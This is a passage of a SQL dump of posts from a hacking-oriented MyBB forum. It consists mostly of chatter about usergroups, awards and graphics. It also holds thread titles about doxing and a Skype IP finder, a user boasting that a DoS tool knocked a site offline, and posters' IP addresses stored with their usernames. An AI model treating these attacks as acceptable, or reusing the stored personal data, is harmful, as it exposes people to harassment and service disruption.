broken. [Spoiler] http://www.ajoyfulheart.com/pspphot...shresources.htm http://www.smashingmagazine.com/2007/01%C3%83...tutorials/ http://graphicssoft.about.com/od/illust%C3%83...lrings.htm http://www.adobe.com/support/fireworks/%C3%83...index.html http://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts [/Spoiler] [/quote] The links are dead because of server is down. [/quote] Adobe is down? Are you sure? It is up. It doesn\'t work because of the ... in the URL. -.- Fix them [/quote] The dead links are removed now ;) [/quote] Thanks for taking the time to do so. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ac4ebabc8236e0b04a83096d241a780', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('992', '213', '953', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1345948530', '[quote=\'t3h jok3r\' pid=\'953\' dateline=\'1345935403\'] [quote=\'iTzIpod\' pid=\'878\' dateline=\'1345867692\'] I would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =] Will be looking for a co - leader too. [/quote] Troll groups are not accepted. >:) I will take a look at your application in a while. [/quote] Oh all right. :p I made a Unique Usergroup instead. Well. I made an application. Hoping it to become official!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83528770b6b6950f5cd9f032b92973d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('993', '233', '968', '58', 'RE: Reviewers Group???', '0', '82', 'iTzIpod', '1345948629', 'Marketplace isn\'t active at the moment. So I don\'t think now is a good time. Although maybe in the future, this suggestion will be good. But not now. ----------------------------------- Or if we add that suggestion, the Marketplace will become active? :o Who knows?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '314b6fe042039a89547241926e09511a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('994', '79', '975', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345949251', '[quote=\'t3h jok3r\' pid=\'975\' dateline=\'1345937849\'] Guts? Well OK, I would also think twice before doing this. [/quote] Yeah. I wanna be like a Ninja and don\'t get caught. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1125d0a60dff7efbd4f770dfdb038ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('995', '130', '981', '15', 'RE: Skype IP Finder - FREE', '0', '82', 'iTzIpod', '1345949340', '[quote=\'t3h jok3r\' pid=\'981\' dateline=\'1345940956\'] Oh I see. Finally one of my giveaways were useful for a moment. [/quote] Wait so this no longer works? Even with your API in the + Section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e11501340019a14af9f4b1567751a09c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('996', '29', '83', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '82', 'iTzIpod', '1345949449', 'Seems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao [hr] EDIT: Works! t3h jok3r I did it! :D [img]http://i.imgur.com/4axu8.png[/img] Woot EDIT: t3h jok3r. It came back on after 3 minutes.. -.-', '24.212.197.164', '416597412', '1', '0', '82', '1345956482', '1', '87adb234f675ec9e32682d8fedc5920e', '0', '1345956482'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6939', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351894937', 'Updated thread. Will be doing this for the first 3 posters below me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '661e545a67c55fc11bb53b53816d3f2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6940', '719', '3646', '16', 'RE: AstroPID Clean', '0', '82', 'iTzIpod', '1351894979', 'Pictures? :p Just knowing that you got DOXed and all. I can\'t trust you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f07cce68672e7c58f89091af5ed7917', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6941', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '62', 'R?????zo?', '1351895370', 'I\'m interested if you could help me :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4f729ef34de3b6c5cc7e8ebad6aa0f7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('998', '226', '919', '11', 'RE: A Newbies Guide', '0', '82', 'iTzIpod', '1345949816', 'Nice guide =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88ba3861d4423072e031e832c93a3652', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('999', '207', '776', '3', 'RE: Suggest awards and apply for awards', '0', '82', 'iTzIpod', '1345949937', '@Apathy, will you ever consider adding any awards soon? We got quite a few suggestions that are really good. Post Whore Rep Whore Newbie Hacker Trusted [hr] Award Name: Trusted/Trusted Award Award Description: Self-explanatory. How to obtain: This award is given to those members who are trusted and have high rep in the community. Award Icon: http://i.imgur.com/Mosfz.png [img]http://i.imgur.com/Mosfz.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345950260', '1', '33142b11a3ec616ab468417bde07daa6', '0', '1345950260'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1076', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '1', 't3h jok3r', '1346015895', 'No problem, glad to see you got things worked out.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '304f61cd0b5dfe73943f209008bd5f60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1077', '241', '1058', '49', 'RE: [Suggestion] Questions Section', '0', '1', 't3h jok3r', '1346016098', '[quote=\'JakeUS\' pid=\'1058\' dateline=\'1345992133\'] You can just ask questions through private messages or the rules and announcements section. [/quote] I agree with this. Plus when a Moderator, Staff or Admin answers the thread, the thread will be closed unless they leave it open for further discussions. Now for example, if we do this then maybe people post their feedback then after a Mod saying for example \"LH is really a nice site etc\" then the thread gets closed auto then it will be messed up because it\'s a misc discussion thread, not a question. Also cross posting means creating the same thread with same subject(topic) more than once.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '7cf94883171e9343a09076b2555143bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1001', '233', '968', '58', 'RE: Reviewers Group???', '0', '2', 'Apathy', '1345950871', 'Not needed we do not have enough active members', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '06e13163da68745c4bee74af2210a350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1002', '236', '0', '49', '[Suggestion] Reporting Posts', '0', '82', 'iTzIpod', '1345951020', 'Hey LH, Another suggestion. So anyways, if you report a post, you will have the option to pick a reason why you want to report it. But, with this suggestion, you are allowed to report a post by choosing one of the options. And also explaining how it is -insert reason here-. For example A user named tnl4utlgn43gn34ide made a post on this thread. And the post was: \";a;a;aaafaf spammng yay. free posts.\" And I happen to see that post and so I report it for \"SPAM\" And then I write a little message to a Mods/SMods/Admins explaining why I reported that post and also how it is SPAM. That way it would be a lot easier for the Mods/SMods/Admins to view and moderate the forum. NOTE: Please have good grammar though. And make sure your spelling and everything makes sense. Otherwise we won\'t be able to understand why you reported that post. Agree? Disagree? Discuss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a691a963a9b0b5f42ec008ba4cb17a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1003', '236', '1002', '49', 'RE: [Suggestion] Reporting Posts', '0', '2', 'Apathy', '1345951081', 'When did you become mod?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '2c1d59b350bc963445c497560ac3b6aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1005', '219', '888', '35', 'RE: My Designs', '0', '2', 'Apathy', '1345951214', 'The second one looks like just c4d spam with a render pasted on and a light soft brush. :3 keep working at it.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '8305bc164a20982a87d3e7d2f30d868a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1006', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '82', 'iTzIpod', '1345951240', 'Agreed with Timmy. Lmfao. Did someone say \"Ipod\"?!?!??!? :D Have no fear, iTzIpod is here. =] OT: I don\'t get this? Wait.. I don\'t know how to code.', '24.212.197.164', '416597412', '1', '0', '82', '1345951377', '1', 'b7ec83c74db928136125f0716eb42498', '0', '1345951377'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1007', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '2', 'Apathy', '1345951282', 'Good.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '5c691537e38dac6edefb46d74c5bd904', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1008', '212', '930', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345951404', '[quote=\'iTzIpod\' pid=\'930\' dateline=\'1345918349\'] [quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\'] So are you going to make it official???? [/quote] t3h jok3r is probably busy today. OT: [b]Name of group:[/b] Unique [b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. [b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img] [b]Forum Name:[/b] Unique Headquarters [b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img] [b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity. [/quote] Interesting idea but ficon is not unique... I will make one if you want.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'ef93f8dae3db873b3b530a833e2e9e1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1009', '235', '980', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1345951506', 'Not a question, but, it feels great to be a Moderator on an awesome forum. I was Moderator on a lot of forums. But this one is actually a great forum. So far, my journey as a Mod on LH is great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5aa968dc386b0b3f7f5863945ffb22ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1010', '237', '0', '35', 'My attempt at a smudge tag [learning]', '0', '2', 'Apathy', '1345951622', 'What do you guys think: [IMG]http://i.imgur.com/e9Obu.png[/IMG] I think it alright.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '239efba5c795cf48693e2c103425f58d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1011', '134', '964', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345951666', '[quote=\'t3h jok3r\' pid=\'964\' dateline=\'1345936834\'] [quote=\'iTzIpod\' pid=\'901\' dateline=\'1345904080\'] Referred 4 members so far. Will be referring more! [/quote] Thanks for referring. 6 left. [/quote] 5 Now. =] Won\'t take long.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44581e541a706014143a7c04eca95238', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1013', '221', '963', '7', 'RE: L33t Hacking Advertisement Video', '0', '82', 'iTzIpod', '1345951774', '[quote=\'t3h jok3r\' pid=\'963\' dateline=\'1345936818\'] The code you are using is [code] [video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] [/code] The code you should be using is [code] [video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] [/code] So it will look like [video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] [/quote] Ah I see. My apologies. It was like [video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] on other forums.. But, I will update the thread now. Thanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7833ee8c602b7857a9213948704f03e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1014', '197', '982', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345951970', '[quote=\'t3h jok3r\' pid=\'982\' dateline=\'1345941178\'] [quote=\'iTzIpod\' pid=\'898\' dateline=\'1345900864\'] [quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\'] * t3h jok3r likes the cookie. Can I have more? [/quote] * iTzIpod slaps t3h jok3r with a fish for asking for more cookies without saying please. :p [/quote] * t3h jok3r cries for being slapped with a [s]dick[/s] fish. [b]Was it funny? I wish I could get the jokester award :D[/b] [/quote] /me laughs at the bolded text. xD Jokes. Did you mean fish\'s dick? :o', '24.212.197.164', '416597412', '1', '0', '82', '1345952004', '1', '46f1c282c4220340ebf9567e83592571', '0', '1345952004'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1015', '237', '1010', '35', 'RE: My attempt at a smudge tag [learning]', '0', '82', 'iTzIpod', '1345952107', 'Agreed with you. It\'s alright. =] Very good for beginner. Did you follow a tutorial? I suggest you work on the colors. And then smudge them all together.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2289b595752179baaebe17c3f30352a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1016', '219', '1005', '35', 'RE: My Designs', '0', '82', 'iTzIpod', '1345952188', '[quote=\'Apathy\' pid=\'1005\' dateline=\'1345951214\'] The second one looks like just c4d spam with a render pasted on and a light soft brush. :3 keep working at it. [/quote] :p It still looks cool though don\'t you think? Do you want to see the .PSD of it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce1f156fddee5b14826f438f32d97248', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1017', '236', '1003', '49', 'RE: [Suggestion] Reporting Posts', '0', '82', 'iTzIpod', '1345952338', '[quote=\'Apathy\' pid=\'1003\' dateline=\'1345951081\'] When did you become mod? [/quote] Yesterday. t3h jok3r was desperately begging me to be Mod. Jokes aside [removed] [hr] EDIT: Whoops. Wrong section.', '24.212.197.164', '416597412', '1', '0', '1', '1346015549', '1', '7e8454094c94c7b0a0af1fcb489b8323', '0', '1346015549'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1018', '237', '1015', '35', 'RE: My attempt at a smudge tag [learning]', '0', '2', 'Apathy', '1345952441', '[quote=\'iTzIpod\' pid=\'1015\' dateline=\'1345952107\'] Agreed with you. It\'s alright. =] Very good for beginner. Did you follow a tutorial? I suggest you work on the colors. And then smudge them all together. [/quote] No tutorial just me. I an no beginner... Just at smudging.... The colors are fine. Thanks for the feed back.', '70.53.236.250', '1177939194', '0', '0', '2', '1345952521', '1', '87ef1f1d22072a74fff17d26456eb411', '0', '1345952521'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1019', '237', '1018', '35', 'RE: My attempt at a smudge tag [learning]', '0', '82', 'iTzIpod', '1345952881', '[quote=\'Apathy\' pid=\'1018\' dateline=\'1345952441\'] [quote=\'iTzIpod\' pid=\'1015\' dateline=\'1345952107\'] Agreed with you. It\'s alright. =] Very good for beginner. Did you follow a tutorial? I suggest you work on the colors. And then smudge them all together. [/quote] No tutorial just me. I an no beginner... Just at smudging.... The colors are fine. Thanks for the feed back. [/quote] Let me rephrase my post above. I meant It was very good for a beginner smudger. ------------------------------------- Also, it was just a suggestion about the colors. And it is your work. Not mine. So you get to decide what is on it and what is not. Good luck smudging. Have fun too..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4507ba864926bca5e6d7a7743a66339c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1020', '212', '1008', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345952955', '[quote=\'Apathy\' pid=\'1008\' dateline=\'1345951404\'] [quote=\'iTzIpod\' pid=\'930\' dateline=\'1345918349\'] [quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\'] So are you going to make it official???? [/quote] t3h jok3r is probably busy today. OT: [b]Name of group:[/b] Unique [b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. [b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img] [b]Forum Name:[/b] Unique Headquarters [b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img] [b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity. [/quote] Interesting idea but ficon is not unique... I will make one if you want. [/quote] I would appreciate it if you make me one! =] Thanks in advance Apathy! - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0c6b41956b688dd83e225f8a73373ee3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1021', '238', '0', '56', 'Ban the user above you', '0', '82', 'iTzIpod', '1345953707', 'This is a fairly popular forum game. Basically, you ban the user who posted above you. But you have to include a reason why. Example: User 1: banned for starting thread. User 2: Banned for not starting with a capital User 3: Banned for not ending with a period. Etc.', '24.212.197.164', '416597412', '1', '0', '82', '1345953894', '1', 'b5d2fa198c4596491468cf15697d58ac', '0', '1345953894'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1022', '239', '0', '7', '1000th Post', '0', '82', 'iTzIpod', '1345954747', 'Hey LH, I would like to congratulate L33t Hacking on 1000 posts. After 2 months and 12 days, we finally achieved a Forum Goal of 1000 posts. I would like to thank all the members who have posted and participated in this forum. Without you, this wouldn\'t happen. CONGRATULATIONS L33T HACKING ON 1000 POSTS. ONCE A L33T, ALWAYS A L33T. Images: 999 Posts before the thread was made: [img]http://i.imgur.com/mvPxZ.png[/img] 1000 Posts after the thread was made: [img]http://i.imgur.com/tWtWF.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345955133', '1', '193bfdc365f5bcf623eb4977a05b5a64', '0', '1345955133'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1023', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345956488', 'You are most welcome Bro!', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'f6ab287ba82afdc3143b9a7ee597b88a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1024', '226', '998', '11', 'RE: A Newbies Guide', '0', '54', 'Sin Cara', '1345956558', '[quote=\'iTzIpod\' pid=\'998\' dateline=\'1345949816\'] Nice guide =] [/quote] you are welcome Bro ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'cdde032676356e8b19efcbf6ab9c5a7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1074', '25', '1050', '19', 'RE: Blackhat System Scanner', '0', '1', 't3h jok3r', '1346015663', '[quote=\'BurnsH4X\' pid=\'1050\' dateline=\'1345986015\'] y dose avg say its a virus? [/quote] I have no idea why, it\'s a clean program. I use it as well, you can also download it from the official Vulcan Tools website.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '80e054377525bf8f7f5da7e57503d1d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1025', '240', '0', '3', '[Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1345957663', 'I noticed the section [url=http://l33thacking.com/forumdisplay.php?fid=50]Complaints & Rep Abuse Support[/url] was supposed to be a Private Section meaning only [b]YOU[/b] can see your threads. And when I was a normal member, I noticed that I could view threads in there. Please fix this issue. Complaints & Rep Abuse Support Have a complaint against someone? Need to report a valid rep abuse? [b]You can only view your own threads. [/b] Fix that please. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '556acdcec0334ed6cf5e5b72ee8666e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1026', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345957891', 'Aight iTzIpof banner indefinitely because I can :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '82046199c9ce837283ccff77df08993b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1027', '239', '1022', '7', 'RE: 1000th Post', '0', '2', 'Apathy', '1345957932', 'Lol yay.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'bc38b12c781b0106cd2f2c87c0d520b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1028', '241', '0', '49', '[Suggestion] Questions Section', '0', '82', 'iTzIpod', '1345958174', 'Hey LH, I am suggesting a Sub Forum in the Announcements, Feedback, Bugs and Suggestions Section. In this section, you can ask an Admin. Any question or concerns about the forum. No trolling will be permitted. For example: I want to ask t3h jok3r or Apathy a question about the rules. So I make a New thread in that section. And then post my question. And then, my question is: \"On the \"[url=http://l33thacking.com/misc.php?action=help&hid=10] Warning System[/url]\" page, I noticed that I can receive a warning for the following: Adult Content (+20 points) Cross Posting (+20 points) Disallowed Blackhat Activity (+30 points) Donation Begging (+10 points) Infected download or link (+25 points) Leeching (+20 points) Nonsense (+10 points) Off topic or Unrelated (+10 points) Personal Data (+15 points) Profile Violation (+15 points) Reputation Abuse (+25 points) SPAM (+20 points) Threat or Harassment (+40 points) Wrong Forum (+15 points) But what do you mean by : Cross Posting (+20 